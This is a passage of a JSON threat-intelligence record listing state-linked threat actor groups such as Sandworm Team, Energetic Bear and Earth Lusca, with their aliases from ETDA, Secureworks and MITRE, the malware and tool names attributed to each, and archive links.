			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75455540-2f6e-467c-9225-8fe670e50c47",
			"created_at": "2022-10-25T16:07:23.740266Z",
			"updated_at": "2026-04-10T02:00:04.732992Z",
			"deleted_at": null,
			"main_name": "Iridium",
			"aliases": [],
			"source_name": "ETDA:Iridium",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"LazyCat",
				"Powerkatz",
				"SinoChopper",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434485,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/af771e2a33fc545ce7a4a2a0f89910843eb484c0.pdf",
		"text": "https://archive.orkl.eu/af771e2a33fc545ce7a4a2a0f89910843eb484c0.txt",
		"img": "https://archive.orkl.eu/af771e2a33fc545ce7a4a2a0f89910843eb484c0.jpg"
	}
}